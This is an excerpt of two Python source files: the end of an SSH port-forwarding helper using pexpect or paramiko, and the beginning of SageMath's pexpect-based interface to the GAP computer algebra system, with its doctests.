"""Create an ssh tunnel using command-line ssh that connects port lport
on this machine to localhost:rport on server. The tunnel
will automatically close when not in use, remaining open
for a minimum of timeout seconds for an initial connection.
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko_tunnel")
ssh="ssh "
if keyfile:
ssh += "-i " + keyfile
if ':' in server:
server, port = server.split(':')
ssh += " -p %s" % port
cmd = "%s -f -L 127.0.0.1:%i:%s:%i %s sleep %i" % (
ssh, lport, remoteip, rport, server, timeout)
tunnel = pexpect.spawn(cmd)
failed = False
while True:
try:
tunnel.expect('[Pp]assword:', timeout=.1)
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
if tunnel.exitstatus:
print (tunnel.exitstatus)
print (tunnel.before)
print (tunnel.after)
raise RuntimeError("tunnel '%s' failed to start"%(cmd))
else:
return tunnel.pid
else:
if failed:
print("Password rejected, try again")
password=None
if password is None:
password = getpass("%s's password: "%(server))
tunnel.sendline(password)
failed = True
def _split_server(server):
if '@' in server:
username,server = server.split('@', 1)
else:
username = getuser()
if ':' in server:
server, port = server.split(':')
port = int(port)
else:
port = 22
return username, server, port
def paramiko_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""launch a tunner with paramiko in a subprocess. This should only be used
when shell ssh is unavailable (e.g. Windows).
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
If you are familiar with ssh tunnels, this creates the tunnel:
ssh server -L localhost:lport:remoteip:rport
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if paramiko is None:
raise ImportError("Paramiko not available")
if password is None:
if not _try_passwordless_paramiko(server, keyfile):
password = getpass("%s's password: "%(server))
p = Process(target=_paramiko_tunnel,
args=(lport, rport, server, remoteip),
kwargs=dict(keyfile=keyfile, password=password))
p.daemon=False
p.start()
atexit.register(_shutdown_process, p)
return p
def _shutdown_process(p):
if p.is_alive():
p.terminate()
def _paramiko_tunnel(lport, rport, server, remoteip, keyfile=None, password=None):
"""Function for actually starting a paramiko tunnel, to be passed
to multiprocessing.Process(target=this), and not called directly.
"""
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True, password=password)
# except paramiko.AuthenticationException:
# if password is None:
# password = getpass("%s@%s's password: "%(username, server))
# client.connect(server, port, username=username, password=password)
# else:
# raise
except Exception as e:
print ('*** Failed to connect to %s:%d: %r' % (server, port, e))
sys.exit(1)
# print ('Now forwarding port %d to %s:%d ...' % (lport, server, rport))
try:
forward_tunnel(lport, remoteip, rport, client.get_transport())
except KeyboardInterrupt:
print ('SIGINT: Port forwarding stopped cleanly')
sys.exit(0)
except Exception as e:
print ("Port forwarding stopped uncleanly: %s"%e)
sys.exit(255)
if sys.platform == 'win32':
ssh_tunnel = paramiko_tunnel
else:
ssh_tunnel = openssh_tunnel
__all__ = ['tunnel_connection', 'ssh_tunnel', 'openssh_tunnel', 'paramiko_tunnel', 'try_passwordless_ssh']
|
gap.py
|
# -*- coding: utf-8 -*-
r"""
Interface to GAP
Sage provides an interface to the GAP system. This system provides
extensive group theory, combinatorics, etc.
The GAP interface will only work if GAP is installed on your
computer; this should be the case, since GAP is included with Sage.
The interface offers three pieces of functionality:
#. ``gap_console()`` - A function that dumps you into
an interactive command-line GAP session.
#. ``gap(expr)`` - Evaluation of arbitrary GAP
expressions, with the result returned as a string.
#. ``gap.new(expr)`` - Creation of a Sage object that
wraps a GAP object. This provides a Pythonic interface to GAP. For
example, if ``f=gap.new(10)``, then
``f.Factors()`` returns the prime factorization of
`10` computed using GAP.
First Examples
--------------
We factor an integer using GAP::
sage: n = gap(20062006); n
20062006
sage: n.parent()
Gap
sage: fac = n.Factors(); fac
[ 2, 17, 59, 73, 137 ]
sage: fac.parent()
Gap
sage: fac[1]
2
GAP and Singular
----------------
This example illustrates conversion between Singular and GAP via
Sage as an intermediate step. First we create and factor a Singular
polynomial.
::
sage: singular(389)
389
sage: R1 = singular.ring(0, '(x,y)', 'dp')
sage: f = singular('9*x^16-18*x^13*y^2-9*x^12*y^3+9*x^10*y^4-18*x^11*y^2+36*x^8*y^4+18*x^7*y^5-18*x^5*y^6+9*x^6*y^4-18*x^3*y^6-9*x^2*y^7+9*y^8')
sage: F = f.factorize()
sage: print(F)
[1]:
_[1]=9
_[2]=x^6-2*x^3*y^2-x^2*y^3+y^4
_[3]=-x^5+y^2
[2]:
1,1,2
Next we convert the factor `-x^5+y^2` to a Sage
multivariate polynomial. Note that it is important to let
`x` and `y` be the generators of a polynomial ring,
so the eval command works.
::
sage: R.<x,y> = PolynomialRing(QQ,2)
sage: s = F[1][3].sage_polystring(); s
'-x**5+y**2'
sage: g = eval(s); g
-x^5 + y^2
Next we create a polynomial ring in GAP and obtain its
indeterminates::
sage: R = gap.PolynomialRing('Rationals', 2); R
PolynomialRing( Rationals, ["x_1", "x_2"] )
sage: I = R.IndeterminatesOfPolynomialRing(); I
[ x_1, x_2 ]
In order to eval `g` in GAP, we need to tell GAP to view
the variables ``x0`` and ``x1`` as the two
generators of `R`. This is the one tricky part. In the GAP
interpreter the object ``I`` has its own name (which
isn't ``I``). We can access its name using
``I.name()``.
::
sage: _ = gap.eval("x := %s[1];; y := %s[2];;"%(I.name(), I.name()))
Now `x_0` and `x_1` are defined, so we can
construct the GAP polynomial `f` corresponding to
`g`::
sage: R.<x,y> = PolynomialRing(QQ,2)
sage: f = gap(str(g)); f
-x_1^5+x_2^2
We can call GAP functions on `f`. For example, we evaluate
the GAP ``Value`` function, which evaluates `f`
at the point `(1,2)`.
::
sage: f.Value(I, [1,2])
3
sage: g(1,2) # agrees
3
Saving and loading objects
--------------------------
Saving and loading GAP objects (using the dumps method, etc.) is
*not* supported, since the output string representation of Gap
objects is sometimes not valid input to GAP. Creating classes that
wrap GAP objects *is* supported, via simply defining the a
_gap_init_ member function that returns a string that when
evaluated in GAP constructs the object. See
``groups/perm_gps/permgroup.py`` for a nontrivial
example of this.
Long Input
----------
The GAP interface reads in even very long input (using files) in a
robust manner, as long as you are creating a new object.
.. note::
Using ``gap.eval`` for long input is much less robust, and is not
recommended.
::
sage: t = '"%s"'%10^10000 # ten thousand character string.
sage: a = gap(t)
Changing which GAP is used
--------------------------
Use this code to change which GAP interpreter is run. E.g.,
::
import sage.interfaces.gap
sage.interfaces.gap.gap_cmd = "/usr/local/bin/gap"
AUTHORS:
- David Joyner and William Stein: initial version(s)
- William Stein (2006-02-01): modified gap_console command so it uses
exactly the same startup command as Gap.__init__.
- William Stein (2006-03-02): added tab completions: gap.[tab], x =
gap(...), x.[tab], and docs, e.g., gap.function? and x.function?
"""
#*****************************************************************************
# Copyright (C) 2005 William Stein <wstein@gmail.com>
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
from .expect import Expect, ExpectElement, FunctionElement, ExpectFunction
from .gap_workspace import gap_workspace_file, prepare_workspace_dir
from sage.cpython.string import bytes_to_str
from sage.env import SAGE_EXTCODE
from sage.misc.misc import is_in_string
from sage.misc.cachefunc import cached_method
from sage.docs.instancedoc import instancedoc
from sage.interfaces.tab_completion import ExtraTabCompletion
from sage.structure.element import ModuleElement
import re
import os
import io
import pexpect
import time
import platform
import string
import warnings
WORKSPACE = gap_workspace_file()
first_try = True
gap_cmd = "gap -r"
if platform.processor() == 'ia64' and os.path.exists('/usr/bin/prctl'):
# suppress unaligned access to 0x..., ip=0x... warnings
gap_cmd = 'prctl --unaligned=silent ' + gap_cmd
def gap_command(use_workspace_cache=True, local=True):
if use_workspace_cache:
if local:
return "%s -L %s"%(gap_cmd, WORKSPACE), False
else:
# TO DO: Use remote workspace
return gap_cmd, False
else:
return gap_cmd, True
############ Classes with methods for both the GAP3 and GAP4 interface
class Gap_generic(ExtraTabCompletion, Expect):
r"""
Generic interface to the GAP3/GAP4 interpreters.
AUTHORS:
- William Stein and David Joyner (interface for GAP4)
- Franco Saliola (Feb 2010): refactored to separate out the generic
code
"""
_identical_function = "IsIdenticalObj"
def _synchronize(self, timeout=0.5, cmd='%s;'):
"""
Synchronize GAP pexpect interface.
See the base method
:meth:`~sage.interfaces.expect.Expect._synchronize` for more
details.
We override this method since we are looking at GAP package
mode output, which is quite different from the normal
(human-readable) interface.
EXAMPLES::
sage: gap('"ok"')
ok
sage: gap._expect.sendline() # now we are out of sync
1
sage: gap._synchronize()
sage: gap(123)
123
"""
if self._expect is None:
return
E = self._expect
from sage.misc.prandom import randrange
rnd = randrange(2147483647)
cmd = str(rnd)+';'
try:
E.sendline(cmd)
E.expect(r'@[nf][@J\s>]*'+str(rnd), timeout=timeout)
E.send(' ')
E.expect('@i', timeout=timeout)
except pexpect.TIMEOUT:
self.interrupt()
except pexpect.EOF:
self._crash_msg()
self.quit()
def interrupt(self, tries=None, timeout=1, quit_on_fail=True):
"""
Interrupt the GAP process
Gap installs a SIGINT handler, we call it directly instead of
trying to sent Ctrl-C. Unlike
:meth:`~sage.interfaces.expect.Expect.interrupt`, we only try
once since we are knowing what we are doing.
Sometimes GAP dies while interrupting.
EXAMPLES::
sage: gap._eval_line('while(1=1) do i:=1;; od;', wait_for_prompt=False)
''
sage: rc = gap.interrupt(timeout=1)
sage: [ gap(i) for i in range(10) ] # check that it is still working
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
TESTS::
sage: gap('"finished computation"'); gap.interrupt(); gap('"ok"')
finished computation
True
ok
"""
E = self._expect
if E is None:
return True
# GAP oddity: If a computation is running and we send Ctrl-C,
# it is stopped as expected. But if we are at the idle prompt,
# nothing is happening UNTIL we run the next command (which is
# then immediately interrupted).
# There is apparently also a race in GAP between the signal
# handler and input, if we don't wait a bit the result is
# unpredictable.
E.sendline(chr(3))
time.sleep(0.1)
E.sendline()
try:
# send a dummy command
E.sendline('224433409;')
# read everything up to the actual output of the command
E.expect(r'@[nf][@J\s>]*224433409', timeout=timeout)
E.send(' ')
# the following input prompt should be the current input
# prompt but GAP might be too confused to display it
# E.expect('@i', timeout=timeout)
# Ideally, we would be finished here. But sometimes GAP
# thinks it is still inside a do/od block. So we run some
# more plain commands to get back into sync. These might
# either complete successfully (output "@n+<number>") or
# return a "Syntax error: od expected@J@f +<number>"
E.sendline()
time.sleep(0.1)
E.sendline('224433437;')
E.expect(r'@[nf][@J\s>]*224433437', timeout=timeout)
E.sendline()
time.sleep(0.1)
E.sendline('224433479;')
E.expect(r'@[nf][@J\s>]*224433479', timeout=timeout)
E.send(' ')
# the following input prompt is now the current input prompt
E.expect('@i', timeout=timeout)
success = True
except (pexpect.TIMEOUT, pexpect.EOF):
# GAP died or hangs indefinitely
success = False
if not success and quit_on_fail:
self.quit()
return success
def _assign_symbol(self):
r"""
Return the assign symbol in GAP.
TESTS::
sage: gap = Gap()
sage: print(gap._assign_symbol())
:=
"""
return ":="
def _quit_string(self):
"""
Returns the string used to quit GAP.
EXAMPLES::
sage: gap._quit_string()
'quit;'
::
sage: g = Gap()
sage: a = g(2); g.is_running()
True
sage: g.quit()
sage: g.is_running()
False
"""
return 'quit;'
def _read_in_file_command(self, filename):
r"""
Returns the command use to read in a file in GAP.
EXAMPLES::
sage: gap._read_in_file_command('test')
'Read("test");'
::
sage: filename = tmp_filename()
sage: with open(filename, 'w') as f:
....: _ = f.write('xx := 22;\n')
sage: gap.read(filename)
sage: gap.get('xx').strip()
'22'
"""
return 'Read("%s");' % filename
def _continuation_prompt(self):
"""
Returns the continuation prompt in GAP.
EXAMPLES::
sage: gap._continuation_prompt()
'> '
"""
return '> '
def load_package(self, pkg, verbose=False):
"""
Load the Gap package with the given name.
If loading fails, raise a RuntimeError exception.
TESTS::
sage: gap.load_package("chevie")
Traceback (most recent call last):
...
RuntimeError: Error loading Gap package chevie. You may want to install gap_packages SPKG.
"""
if verbose:
print("Loading GAP package {}".format(pkg))
x = self.eval('LoadPackage("{}")'.format(pkg))
if x == 'fail':
raise RuntimeError("Error loading Gap package "+str(pkg)+". "+
"You may want to install gap_packages SPKG.")
def eval(self, x, newlines=False, strip=True, split_lines=True, **kwds):
r"""
Send the code in the string s to the GAP interpreter and return the
output as a string.
INPUT:
- ``s`` - string containing GAP code.
- ``newlines`` - bool (default: True); if False,
remove all backslash-newlines inserted by the GAP output
formatter.
- ``strip`` - ignored
- ``split_lines`` -- bool (default: True); if True then each
line is evaluated separately. If False, then the whole
block of code is evaluated all at once.
EXAMPLES::
sage: gap.eval('2+2')
'4'
sage: gap.eval('Print(4); #test\n Print(6);')
'46'
sage: gap.eval('Print("#"); Print(6);')
'#6'
sage: gap.eval('4; \n 6;')
'4\n6'
sage: gap.eval('if 3>2 then\nPrint("hi");\nfi;')
'hi'
sage: gap.eval('## this is a test\nPrint("OK")')
'OK'
sage: gap.eval('Print("This is a test. Oh no, a #");# but this is a comment\nPrint("OK")')
'This is a test. Oh no, a #OK'
sage: gap.eval('if 4>3 then')
''
sage: gap.eval('Print("Hi how are you?")')
'Hi how are you?'
sage: gap.eval('fi')
''
TESTS:
Whitespace is not stripped from the front of the result
(:trac:`28439`)::
sage: gap.eval(r'Print(" -\n\\\\- ")')
' -\n\\\\-'
"""
# '"
#We remove all of the comments: On each line, we try
#to find a pound sign. If we find it, we check to see if
#it is occurring in a string. If it is not in a string, we
#strip off the comment.
if not split_lines:
input_line=str(x)
else:
input_line = ""
for line in str(x).rstrip().split('\n'):
pound_position = line.find('#')
while pound_position != -1:
if not is_in_string(line, pound_position):
line = line[:pound_position]
pound_position = line.find('#',pound_position+1)
input_line += " "+line
if not input_line.endswith(';'):
input_line += ';'
result = Expect.eval(self, input_line, **kwds)
if not newlines:
result = result.replace("\\\n","")
return result.rstrip()
def _execute_line(self, line, wait_for_prompt=True, expect_eof=False):
if self._expect is None: # interface is down
self._start()
E = self._expect
try:
if len(line) > 4095:
raise RuntimeError("Passing commands this long to gap would hang")
E.sendline(line)
except OSError:
raise RuntimeError("Error evaluating %s in %s"%(line, self))
if not wait_for_prompt:
return (b'',b'')
if len(line)==0:
return (b'',b'')
try:
terminal_echo = [] # to be discarded
normal_outputs = [] # GAP stdout
error_outputs = [] # GAP stderr
current_outputs = terminal_echo
while True:
x = E.expect_list(self._compiled_full_pattern)
current_outputs.append(E.before)
if x == 0: # @p
if E.after != b'@p1.':
warnings.warn(
"possibly wrong version of GAP package "
"interface. Crossing fingers and continuing.")
elif x == 1: #@@
current_outputs.append(b'@')
elif x == 2: #special char
c = ord(E.after[1:2]) - ord(b'A') + 1
s = bytes([c])
current_outputs.append(s)
elif x == 3: # garbage collection info, ignore
pass
elif x == 4: # @e -- break loop
E.sendline("quit;")
elif x == 5: # @c completion, doesn't seem to happen when -p is in use
warnings.warn("I didn't think GAP could do this")
elif x == 6: # @f GAP error message
current_outputs = error_outputs
elif x == 7: # @h help text, but this stopped happening with new help
warnings.warn("I didn't think GAP could do this")
elif x == 8: # @i awaiting normal input
break
elif x == 9: # @m finished running a child
pass # there is no need to do anything
elif x==10: #@n normal output line
current_outputs = normal_outputs
elif x==11: #@r echoing input
current_outputs = terminal_echo
elif x==12: #@sN shouldn't happen
warnings.warn("this should never happen")
elif x==13: #@w GAP is trying to send a Window command
warnings.warn("this should never happen")
elif x ==14: #@x seems to be safely ignorable
pass
elif x == 15:#@z GAP starting a subprocess
pass # there is no need to do anything
except pexpect.EOF:
if not expect_eof:
raise RuntimeError("Unexpected EOF from %s executing %s"%(self,line))
except IOError:
raise RuntimeError("IO Error from %s executing %s"%(self,line))
return (b"".join(normal_outputs), b"".join(error_outputs))
def _keyboard_interrupt(self):
"""
TESTS:
We check that the gap interface behaves correctly after an
interrupt::
sage: gap(2)
2
sage: try:
....: alarm(0.5)
....: gap.eval('while(1=1) do i:=1;; od;', wait_for_prompt=True)
....: except KeyboardInterrupt:
....: pass
sage: gap(2)
2
"""
self.quit()
raise KeyboardInterrupt("Ctrl-c pressed while running %s"%self)
def _eval_line(self, line, allow_use_file=True, wait_for_prompt=True, restart_if_needed=True):
r"""
Evaluate a line of commands.
REMARK:
By default, a long command (length exceeding ``self._eval_using_file_cutoff``)
is evaluated using :meth:`_eval_line_using_file`.
If the command can not be evaluated since the interface
has crashed, it is automatically restarted and tried
again *once*.
If the optional ``wait_for_prompt`` is ``False`` then even a very long line
will not be evaluated by :meth:`_eval_line_using_file`, since this does not
support the ``wait_for_prompt`` option.
INPUT:
- ``line`` -- (string) a command.
- ``allow_use_file`` (optional bool, default ``True``) --
allow to evaluate long commands using :meth:`_eval_line_using_file`.
- ``wait_for_prompt`` (optional bool, default ``True``) --
wait until the prompt appears in the sub-process' output.
- ``restart_if_needed`` (optional bool, default ``True``) --
If it is ``True``, the command evaluation is evaluated
a second time after restarting the interface, if an
``EOFError`` occurred.
TESTS::
sage: gap._eval_line('2+2;')
'4'
We test the ``wait_for_prompt`` option by sending a command that
creates an infinite loop in the GAP sub-process. But if we don't
wait for the prompt to appear in the output, we can interrupt
the loop without raising a KeyboardInterrupt. At the same time,
we test that the line is not forwarded to :meth:`_eval_line_using_file`,
since that method would not support the ``wait_for_prompt`` option::
sage: cutoff = gap._eval_using_file_cutoff
sage: gap._eval_using_file_cutoff = 4
sage: gap._eval_line('while(1=1) do i:=1;; od;', wait_for_prompt=False)
''
sage: rc = gap.interrupt(timeout=1)
sage: gap._eval_using_file_cutoff = cutoff
The following tests against a bug fixed at :trac:`10296`::
sage: gap(3)
3
sage: gap.eval('quit;')
''
sage: a = gap(3)
** Gap crashed or quit executing '\$sage...:=3;;' **
Restarting Gap and trying again
sage: a
3
"""
expect_eof = self._quit_string() in line
try:
if self._expect is None:
self._start()
if allow_use_file and wait_for_prompt and len(line) > self._eval_using_file_cutoff:
return self._eval_line_using_file(line)
(normal, error) = self._execute_line(line, wait_for_prompt=wait_for_prompt,
expect_eof=expect_eof)
# The internal method _execute_line returns bytes but the bytes it
# returns should contain text (any terminal commands and other
# garbage should be filtered out by this point); here we decode
# them (on Python 3), currently just using the default encoding
normal, error = bytes_to_str(normal), bytes_to_str(error)
if len(error):
if 'Error, Rebuild completion files!' in error:
error += "\nRunning gap_reset_workspace()..."
self.quit()
gap_reset_workspace()
error = error.replace('\r','')
raise RuntimeError("%s produced error output\n%s\n executing %s"%(self, error,line))
if not len(normal):
return ''
if isinstance(wait_for_prompt, str) and normal.ends_with(wait_for_prompt):
n = len(wait_for_prompt)
elif normal.endswith(bytes_to_str(self._prompt)):
n = len(self._prompt)
elif normal.endswith(self._continuation_prompt()):
n = len(self._continuation_prompt())
else:
n = 0
out = normal[:-n]
if len(out) and out[-1] == "\n":
out = out[:-1]
return out
except (RuntimeError, TypeError, pexpect.ExceptionPexpect) as exc:
if not self._isalive():
# We can't distinguish just EOF from an unexpectedly killed
# process because pexpect catches EOF's and re-reraises them
# But if we *were* expecting EOF then we should just let it
# fail silently and return
if expect_eof:
return ''
print("** %s crashed or quit executing '%s' **" % (self, line))
print("Restarting %s and trying again" % self)
self._start()
if line != '':
return self._eval_line(line, allow_use_file=allow_use_file)
else:
return ''
else:
raise RuntimeError(exc)
except KeyboardInterrupt:
self._keyboard_interrupt()
raise KeyboardInterrupt("Ctrl-c pressed while running %s"%self)
def unbind(self, var):
"""
Clear the variable named var.
EXAMPLES::
sage: gap.set('x', '2')
sage: gap.get('x')
'2'
sage: gap.unbind('x')
sage: gap.get('x')
Traceback (most recent call last):
...
RuntimeError: Gap produced error output
Error, Variable: 'x' must have a value
...
"""
self.eval('Unbind(%s)'%var)
self.clear(var)
def _contains(self, v1, v2):
"""
EXAMPLES::
sage: Integers = gap('Integers')
sage: two = gap(2)
sage: gap._contains(two.name(), Integers.name())
True
::
sage: 2 in gap('Integers')
True
"""
return self.eval('%s in %s'%(v1,v2)) == "true"
def _true_symbol(self):
"""
Returns the symbol for truth in GAP.
EXAMPLES::
sage: gap._true_symbol()
'true'
sage: gap(2) == gap(2)
True
"""
return "true"
def _false_symbol(self):
"""
Returns the symbol for falsity in GAP.
EXAMPLES::
sage: gap._false_symbol()
'false'
sage: gap(2) == gap(3)
False
"""
return "false"
def _equality_symbol(self):
"""
Returns the symbol for equality in GAP.
EXAMPLES::
sage: gap._equality_symbol()
'='
sage: gap(2) == gap(3)
False
sage: gap(2) == gap(2)
True
"""
return "="
def version(self):
"""
Returns the version of GAP being used.
EXAMPLES::
sage: print(gap.version())
4...
"""
return self.eval('GAPInfo.Version')[1:-1]
def function_call(self, function, args=None, kwds=None):
"""
Calls the GAP function with args and kwds.
EXAMPLES::
sage: gap.function_call('SymmetricGroup', [5])
SymmetricGroup( [ 1 .. 5 ] )
If the GAP function does not return a value, but prints something
to the screen, then a string of the printed output is returned.
::
sage: s = gap.function_call('Display', [gap.SymmetricGroup(5).CharacterTable()])
sage: type(s)
<class 'sage.interfaces.interface.AsciiArtString'>
sage: s.startswith('CT')
True
TESTS:
If the function call is too long, two ``gap.eval`` calls are made
since returned values from commands in a file cannot be handled
properly::
sage: g = Gap()
sage: g.function_call("ConjugacyClassesSubgroups", sage.interfaces.gap.GapElement(g, 'SymmetricGroup(2)', name = 'a_variable_with_a_very_very_very_long_name')) # random
[ ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( () )),
ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( [ (1,2) ] )) ]
When the command itself is so long that it warrants use of a temporary
file to be communicated to GAP, this does not cause problems since
the file will contain a single command::
sage: g.function_call("ConjugacyClassesSubgroups", sage.interfaces.gap.GapElement(g, 'SymmetricGroup(2)', name = 'a_variable_with_a_name_so_very_very_very_long_that_even_by_itself_will_make_expect_use_a_file')) # random
[ ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( () )),
ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( [ (1,2) ] )) ]
"""
args, kwds = self._convert_args_kwds(args, kwds)
self._check_valid_function_name(function)
#Here we have to do some magic because not all GAP
#functions return a value. If you try to store their
#results to a variable, then GAP will complain. Thus, before
#we evaluate the function, we make it so that the marker string
#is in the 'last' variable in GAP. If the function returns a
#value, then that value will be in 'last', otherwise it will
#be the marker.
marker = '__SAGE_LAST__:="__SAGE_LAST__";;'
cmd = "%s(%s);;"%(function, ",".join([s.name() for s in args]+
['%s=%s'%(key,value.name()) for key, value in kwds.items()]))
if len(marker) + len(cmd) <= self._eval_using_file_cutoff:
# We combine the two commands so we only run eval() once and the
# only output would be from the second command
res = self.eval(marker+cmd)
else:
self.eval(marker)
res = self.eval(cmd)
if self.eval(self._identical_function + '(last,__SAGE_LAST__)') != 'true':
return self.new('last2;')
else:
if res.strip():
from sage.interfaces.interface import AsciiArtString
return AsciiArtString(res)
def get_record_element(self, record, name):
r"""
Return the element of a GAP record identified by ``name``.
INPUT:
- ``record`` -- a GAP record
- ``name`` -- str
OUTPUT:
- :class:`GapElement`
EXAMPLES::
sage: rec = gap('rec( a := 1, b := "2" )')
sage: gap.get_record_element(rec, 'a')
1
sage: gap.get_record_element(rec, 'b')
2
TESTS::
sage: rec = gap('rec( a := 1, b := "2" )')
sage: type(gap.get_record_element(rec, 'a'))
<class 'sage.interfaces.gap.GapElement'>
"""
return self('%s.%s' % (record.name(), name))
# We need to inherit from ModuleElement to support
# sage.structure.coerce_actions.ModuleAction and it needs to be first
# in the MRO because extension types should always come first.
@instancedoc
class GapElement_generic(ModuleElement, ExtraTabCompletion, ExpectElement):
r"""
Generic interface to the GAP3/GAP4 interpreters.
AUTHORS:
- William Stein and David Joyner (interface for GAP4)
- Franco Saliola (Feb 2010): refactored to separate out the generic
code
"""
def _add_(self, other):
"""
EXAMPLES::
sage: a = gap(1)
sage: a + a
2
"""
# This is just a copy of ExpectElement._add_ to fix the fact
# that the abtract method ModuleElement._add_ comes first in
# the MRO.
return self._operation("+", other)
def __bool__(self):
"""
EXAMPLES::
sage: bool(gap(2))
True
sage: gap(0).bool()
False
sage: gap('false').bool()
False
"""
P = self._check_valid()
return self != P(0) and repr(self) != 'false'
__nonzero__ = __bool__
def __len__(self):
"""
EXAMPLES::
sage: v = gap('[1,2,3]'); v
[ 1, 2, 3 ]
sage: len(v)
3
len is also called implicitly by if::
sage: if gap('1+1 = 2'):
....: print("1 plus 1 does equal 2")
1 plus 1 does equal 2
::
sage: if gap('1+1 = 3'):
....: print("it is true")
....: else:
....: print("it is false")
it is false
"""
P = self.parent()
if P.eval('%s = true'%self.name()) == 'true':
return 1
elif P.eval('%s = false'%self.name()) == 'true':
return 0
else:
return int(self.Length())
def is_string(self):
"""
Tell whether this element is a string.
EXAMPLES::
sage: gap('"abc"').is_string()
True
sage: gap('[1,2,3]').is_string()
False
"""
return bool(self.IsString())
def _matrix_(self, R):
r"""
Return matrix over the (Sage) ring R determined by self, where self
should be a Gap matrix.
EXAMPLES::
sage: s = gap("(Z(7)^0)*[[1,2,3],[4,5,6]]"); s
[ [ Z(7)^0, Z(7)^2, Z(7) ], [ Z(7)^4, Z(7)^5, Z(7)^3 ] ]
sage: s._matrix_(GF(7))
[1 2 3]
[4 5 6]
::
sage: s = gap("[[1,2], [3/4, 5/6]]"); s
[ [ 1, 2 ], [ 3/4, 5/6 ] ]
sage: m = s._matrix_(QQ); m
[ 1 2]
[3/4 5/6]
sage: parent(m)
Full MatrixSpace of 2 by 2 dense matrices over Rational Field
::
sage: s = gap('[[Z(16),Z(16)^2],[Z(16)^3,Z(16)]]')
sage: s._matrix_(GF(16,'a'))
[ a a^2]
[a^3 a]
"""
v = self.DimensionsMat()
n = int(v[1])
m = int(v[2])
from sage.matrix.matrix_space import MatrixSpace
M = MatrixSpace(R, n, m)
entries = [[R(self[r,c]) for c in range(1,m+1)] for r in range(1,n+1)]
return M(entries)
############
class Gap(Gap_generic):
r"""
Interface to the GAP interpreter.
AUTHORS:
- William Stein and David Joyner
"""
def __init__(self, max_workspace_size=None,
maxread=None, script_subdirectory=None,
use_workspace_cache=True,
server=None,
server_tmpdir=None,
logfile=None,
seed=None,
env={}):
"""
EXAMPLES::
sage: gap == loads(dumps(gap))
True
"""
self.__use_workspace_cache = use_workspace_cache
cmd, self.__make_workspace = gap_command(use_workspace_cache, server is None)
# -b: suppress banner
# -p: enable "package output mode"; this confusingly named option
# causes GAP to output special control characters that are normally
# intended for communication with a window manager (i.e. for xgap)
# but that we also use to control GAP with pexepect
# -T: disable interactive break loop when encountering errors
# -E: disable readline support
cmd += " -b -p -T -E"
cmd += ' -m 64m ' # attempt at a workaround for http://tracker.gap-system.org/issues/224
cmd += ' ' + os.path.join(SAGE_EXTCODE, 'gap', 'sage.g')
Expect.__init__(self,
name='gap',
prompt='gap> ',
command=cmd,
maxread=maxread,
server=server,
server_tmpdir=server_tmpdir,
script_subdirectory=script_subdirectory,
restart_on_ctrlc=True,
verbose_start=False,
logfile=logfile,
eval_using_file_cutoff=100,
env=env)
self.__seq = 0
self._seed = seed
def set_seed(self,seed=None):
"""
Set the seed for gap interpreter.
The seed should be an integer.
EXAMPLES::
sage: g = Gap()
sage: g.set_seed(0)
0
sage: [g.Random(1,10) for i in range(5)]
[2, 3, 3, 4, 2]
"""
if seed is None:
seed = self.rand_seed()
self.eval("Reset(GlobalMersenneTwister,%d);;" % seed)
self.eval("Reset(GlobalRandomSource,%d);;" % seed)
self._seed = seed
return seed
def __reduce__(self):
"""
EXAMPLES::
sage: gap.__reduce__()
(<function reduce_load_GAP at 0x...>, ())
sage: f, args = _
sage: f(*args)
Gap
"""
return reduce_load_GAP, tuple([])
def _next_var_name(self):
r"""
Returns the next unused variable name.
Note that names starting with dollar signs are valid GAP
identifiers, but need to be escaped with a backslash starting
with GAP-4.8.
EXAMPLES::
sage: g = Gap()
sage: g._next_var_name()
'\\$sage1'
sage: g(2)^2
4
sage: g._next_var_name()
'\\$sage...'
"""
if len(self._available_vars) != 0:
v = self._available_vars[0]
del self._available_vars[0]
return v
self.__seq += 1
return r'\$sage%s'%self.__seq
def _start(self):
"""
EXAMPLES::
sage: g = Gap()
sage: g.is_running()
False
sage: g._start()
sage: g.is_running()
